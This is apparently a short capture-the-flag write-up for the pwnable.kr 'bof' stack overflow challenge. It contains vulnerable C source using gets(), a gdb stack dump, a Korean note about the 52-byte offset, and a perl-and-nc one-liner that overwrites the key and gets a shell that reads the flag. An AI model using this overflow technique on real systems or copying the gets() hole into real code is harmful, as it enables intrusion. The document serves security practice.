bof

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

void func(int key){

char overflowme[32];

printf("overflow me : ");

gets(overflowme); // smash me!

if(key == 0xcafebabe){

system("/bin/sh");

}

else{

printf("Nah..\n");

}

}

int main(int argc, char* argv[]){

func(0xdeadbeef);

return 0;

}

(gdb) x/20x $ebp-0x2c

0xbffff63c: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffff64c: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffff65c: 0x41414141 0x80004141 0x80000530 0xbffff688

0xbffff66c: 0x8000069f 0xdeadbeef 0xb7fff000 0x800006b9

0xbffff67c: 0xb7fc0000 0x800006b0 0x00000000 0x00000000

52바이트만큼 더미 주고 cafebabe 입력하면 됨

root@ubuntu:/home/expointer# (perl -e 'print "A"x52, "\xbe\xba\xfe\xca\n"';cat) | nc pwnable.kr 9000

ls  

bof

bof.c

flag

log

super.pl

cat flag